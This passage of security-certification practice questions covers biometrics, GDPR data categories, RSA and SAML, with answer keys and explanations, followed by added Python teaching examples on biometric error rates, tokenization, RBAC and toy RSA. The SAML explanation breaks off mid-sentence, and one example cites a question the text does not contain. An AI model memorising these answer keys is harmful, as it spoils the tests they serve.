OBJ-3.8: Role-based access control (RBAC) provides a set of organizational roles to which users are assigned in order to gain access rights. Users gain their access rights implicitly, based on the roles (groups) they are members of. Unlike discretionary access control (DAC), where the resource owner sets the ACL, RBAC is non-discretionary: individual users cannot modify the ACL of a resource. Mandatory access control (MAC) makes decisions from security labels and clearances, and attribute-based access control (ABAC) evaluates attributes of the subject, object, and environment at request time.

Which of the following biometric authentication factors uses an infrared light shone into the eye to identify the pattern of blood vessels?
Pupil dilation
Facial recognition
Retinal scan
Iris scan
ANS: Retinal scan
OBJ-2.4: A retinal scan shines a low-intensity infrared light into the eye and maps the pattern of blood vessels on the retina at the back of the eye. An iris scan instead photographs the pattern of the colored ring around the pupil and does not need light to reach the retina. Pupil dilation is not an authentication factor, and facial recognition measures the geometry of the face.

Which of the following categories would contain information about a French citizen's race or

ethnic origin?
SPI
DLP
PII
PHI
ANS: SPI
OBJ-5.5: Under the GDPR, information about an individual's race or ethnic origin is classified as sensitive personal information (SPI), which the regulation itself calls special category data. Sensitive personal information (SPI) is information about a subject's opinions, beliefs, and nature that is afforded specially protected status by privacy legislation. Because race or ethnic origin on its own does not uniquely identify a person and is not health information, it is classified as neither PII nor PHI. Data loss prevention (DLP) is a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks; it is a control, not a data category.

Which of the following cryptographic algorithms is classified as asymmetric?
RSA
AES
DES
RC4
ANS: RSA
OBJ-2.8: RSA (Rivest-Shamir-Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm: a public key for encryption or signature verification and a separate private key for decryption or signing. AES, RC4, and DES are all symmetric algorithms, using the same key for both encryption and decryption. Of those, only AES is still considered secure; DES and RC4 are deprecated.

Which of the following does a User-Agent request a resource from when conducting a SAML transaction?
Service provider (SP)
Relying party (RP)
Single sign-on (SSO)
Identity provider (IdP)
ANS: Service provider (SP)
OBJ-3.8: Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the SP can trust the identity of a user (the principal) without the user having to authenticate directly with the SP. The principal's User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid
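Referring back to the biometric question above: the following is an added example, not part of the exam material, that computes FAR, FRR and the crossover error rate from a constructed set of match scores. The score lists, the 0-100 scale and the function names are assumptions made for the demonstration.

```python
# Added example (not from the exam text): false acceptance rate, false rejection
# rate and crossover error rate of a biometric matcher, computed from a
# constructed set of match scores. All values below are hypothetical.
from typing import Optional, Sequence, Tuple

# Constructed sample data on a 0-100 similarity scale. Genuine attempts are
# authorized users matched against their own template; impostor attempts are
# unauthorized users matched against someone else's template.
GENUINE_SCORES = [91, 88, 85, 79, 76, 72, 70, 66, 61, 58]
IMPOSTOR_SCORES = [12, 20, 28, 35, 42, 49, 55, 60, 64, 69]


def far(impostor: Sequence[float], threshold: float) -> float:
    """False acceptance rate (Type II error): share of impostor attempts whose
    score reaches the accept threshold, i.e. unauthorized users let in."""
    return sum(1 for s in impostor if s >= threshold) / len(impostor)


def frr(genuine: Sequence[float], threshold: float) -> float:
    """False rejection rate (Type I error): share of genuine attempts whose
    score falls below the threshold, i.e. authorized users turned away."""
    return sum(1 for s in genuine if s < threshold) / len(genuine)


def crossover(genuine: Sequence[float], impostor: Sequence[float]) -> Tuple[int, float, float]:
    """Sweep the accept threshold over the whole scale and return
    (threshold, FAR, FRR) where FAR and FRR are closest. At that point
    FAR == FRR is the crossover error rate (CER)."""
    best: Optional[Tuple[int, float, float]] = None
    for t in range(0, 101):
        a, r = far(impostor, t), frr(genuine, t)
        if best is None or abs(a - r) < abs(best[1] - best[2]):
            best = (t, a, r)
    assert best is not None
    return best


if __name__ == "__main__":
    # Raising the threshold trades false accepts for false rejects.
    for t in (50, 62, 80):
        print(f"threshold {t:3d}: FAR={far(IMPOSTOR_SCORES, t):.1f} "
              f"FRR={frr(GENUINE_SCORES, t):.1f}")
    print("crossover (threshold, FAR, FRR):", crossover(GENUINE_SCORES, IMPOSTOR_SCORES))
```

Running it shows the trade-off the explanation describes: at a loose threshold of 50 no authorized user is rejected but 40% of impostors get in, at a strict threshold of 80 no impostor gets in but 70% of authorized users are turned away, and the two curves cross at a threshold of 62 with a CER of 0.2. A vendor quoting only FAR without the matching FRR (or the threshold) is quoting half the picture.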
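Referring back to the data minimization question above: the following is an added example, not code from Dion Training's checkout system, that puts data minimization, data masking and tokenization side by side so the difference in reversibility is visible. The checkout record, its field names and the in-memory token vault are assumptions made for the demonstration.

```python
# Added example (not part of the exam text): data minimization, data masking
# and tokenization contrasted in working code. The record layout, field names
# and the in-memory vault are assumptions; a real vault is a separate,
# access-controlled service.
import secrets
from typing import Dict, FrozenSet

# Constructed checkout record: it contains more than a voucher purchase needs.
SUBMITTED = {
    "name": "Jane Doe",
    "email": "jane@example.com",
    "card": "4111 1111 1111 1111",
    "phone": "555-0100",
    "home_address": "1 Main St",
}

# The only fields the stated purpose (deliver a voucher, take payment) requires.
VOUCHER_FIELDS: FrozenSet[str] = frozenset({"name", "email", "card"})


def minimize(record: Dict[str, str], required: FrozenSet[str]) -> Dict[str, str]:
    """Data minimization: keep only the fields the purpose needs, so the rest
    is never stored and never has to be protected."""
    return {k: v for k, v in record.items() if k in required}


def mask_card(number: str, keep_last: int = 4) -> str:
    """Data masking: irreversibly replace all but the last digits with 'x'.
    Nothing in the output lets anyone recover the original number."""
    digits = number.replace(" ", "")
    return "x" * (len(digits) - keep_last) + digits[-keep_last:]


class TokenVault:
    """Tokenization: swap a value for a random token and keep the mapping only
    here, apart from the production database. Because the vault holds the
    mapping, tokenization is reversible for authorized callers."""

    def __init__(self) -> None:
        self._token_to_value: Dict[str, str] = {}
        self._value_to_token: Dict[str, str] = {}

    def tokenize(self, value: str) -> str:
        if value not in self._value_to_token:
            # Random token: it carries no information about the value itself.
            token = "tok_" + secrets.token_hex(8)
            self._value_to_token[value] = token
            self._token_to_value[token] = value
        return self._value_to_token[value]

    def detokenize(self, token: str) -> str:
        """Reverse lookup; raises KeyError for a token the vault never issued."""
        return self._token_to_value[token]


def process_order(record: Dict[str, str], vault: TokenVault) -> Dict[str, str]:
    """What the production database ends up holding: the minimized fields, the
    card number replaced by a vault token, and a masked copy for receipts."""
    kept = minimize(record, VOUCHER_FIELDS)
    kept["card_token"] = vault.tokenize(kept.pop("card"))
    kept["card_display"] = mask_card(record["card"])
    return kept


if __name__ == "__main__":
    vault = TokenVault()
    stored = process_order(SUBMITTED, vault)
    print(stored)
    print("charge via vault:", vault.detokenize(stored["card_token"]))
```

The production record never contains the phone number or address (minimization), the receipt-safe copy cannot be turned back into a card number (masking), and the card is recoverable only by asking the vault (tokenization). Compromise of the production database alone therefore exposes no usable card numbers.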
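Referring back to the RBAC question above: the following is an added example, not code from any product, showing a minimal role-based access decision and why the model is non-discretionary. The roles, permission strings and user names are assumptions made for the demonstration.

```python
# Added example (not from the exam text): a minimal role-based access control
# check. Roles, permission names and users are assumptions made for the demo.
from typing import Dict, Set

# Roles are defined once by the organization; permissions attach to roles,
# never to individual users.
ROLE_PERMISSIONS: Dict[str, Set[str]] = {
    "student":    {"course:read"},
    "instructor": {"course:read", "course:write"},
    "admin":      {"course:read", "course:write", "user:manage", "role:manage"},
}

# Users are assigned to roles; they hold no permissions of their own.
USER_ROLES: Dict[str, Set[str]] = {
    "jason": {"admin"},
    "julie": {"instructor"},
    "tim":   {"student"},
}


def effective_permissions(user: str) -> Set[str]:
    """Union of the permissions of every role the user is assigned to."""
    perms: Set[str] = set()
    for role in USER_ROLES.get(user, set()):
        perms |= ROLE_PERMISSIONS.get(role, set())
    return perms


def is_authorized(user: str, permission: str) -> bool:
    """Access decision: implicit, derived from role membership only."""
    return permission in effective_permissions(user)


def assign_role(actor: str, user: str, role: str) -> bool:
    """Changing role membership is itself a privileged operation. Unlike DAC,
    an ordinary user cannot grant themselves or others access to a resource;
    only a holder of role:manage can. Returns True if the change was made."""
    if not is_authorized(actor, "role:manage"):
        return False
    if role not in ROLE_PERMISSIONS:  # refuse to invent roles on the fly
        return False
    USER_ROLES.setdefault(user, set()).add(role)
    return True


def revoke_role(actor: str, user: str, role: str) -> bool:
    """Symmetric to assign_role: removing a role also requires role:manage."""
    if not is_authorized(actor, "role:manage"):
        return False
    USER_ROLES.get(user, set()).discard(role)
    return True


if __name__ == "__main__":
    print("tim may write a course:", is_authorized("tim", "course:write"))    # False
    print("tim promotes himself:", assign_role("tim", "tim", "admin"))        # False
    print("jason promotes tim:", assign_role("jason", "tim", "instructor"))   # True
    print("tim may write a course:", is_authorized("tim", "course:write"))    # True
```

The point the question is testing is in assign_role: a student cannot change anyone's permissions, including their own, because the right to alter memberships is itself a permission held by a role. In a DAC system the owner of a course record could simply add tim to its ACL.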
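Referring back to the RSA question above: the following is an added example, not code from the exam or from any cryptographic library, showing with textbook RSA on tiny primes what "asymmetric" means in practice: two different keys, where what the public key encrypts only the private key can decrypt, and what the private key signs anyone can verify with the public key. The primes 61 and 53 and the exponent 17 are assumptions chosen so the numbers stay readable; this is a teaching toy with no padding and a 12-bit modulus, not a usable cipher.

```python
# Added example (not from the exam text): textbook RSA with tiny primes to show
# what an asymmetric algorithm is. No padding, 12-bit modulus: NOT a usable
# cipher. Use a vetted library (e.g. the cryptography package) for real work.
# The primes and exponent are assumptions chosen for readability.
import math
from typing import Tuple

PublicKey = Tuple[int, int]   # (e, n): may be published freely
PrivateKey = Tuple[int, int]  # (d, n): must stay secret


def generate_keypair(p: int, q: int, e: int = 17) -> Tuple[PublicKey, PrivateKey]:
    """Build (public, private) from two primes. e must be coprime with phi(n);
    d is the modular inverse of e, so that e*d == 1 (mod phi)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if math.gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return (e, n), (d, n)


def encrypt(message: int, public: PublicKey) -> int:
    """Anyone holding the public key can encrypt: c = m^e mod n."""
    e, n = public
    if not 0 <= message < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(message, e, n)


def decrypt(ciphertext: int, private: PrivateKey) -> int:
    """Only the private key holder can decrypt: m = c^d mod n."""
    d, n = private
    return pow(ciphertext, d, n)


def sign(message: int, private: PrivateKey) -> int:
    """Signing runs the other way: exponentiate with the private key."""
    d, n = private
    return pow(message, d, n)


def verify(message: int, signature: int, public: PublicKey) -> bool:
    """Anyone can verify with the public key: signature^e mod n == message."""
    e, n = public
    return pow(signature, e, n) == message


if __name__ == "__main__":
    pub, priv = generate_keypair(61, 53)      # n = 3233, phi = 3120
    print("public", pub, "private", priv)     # (17, 3233) (2753, 3233)
    c = encrypt(65, pub)
    print("encrypt(65) =", c, "decrypt =", decrypt(c, priv))   # 2790, 65
    print("decrypting with the PUBLIC key:", pow(c, pub[0], pub[1]))  # not 65
    s = sign(65, priv)
    print("signature", s, "verifies:", verify(65, s, pub))    # True
```

The contrast with AES, DES and RC4 is the last two lines of key material: a symmetric cipher has one key that both parties must share and protect, whereas here the encrypting party needs only (e, n), which can be handed to anyone, and applying the public exponent to the ciphertext does not recover the message.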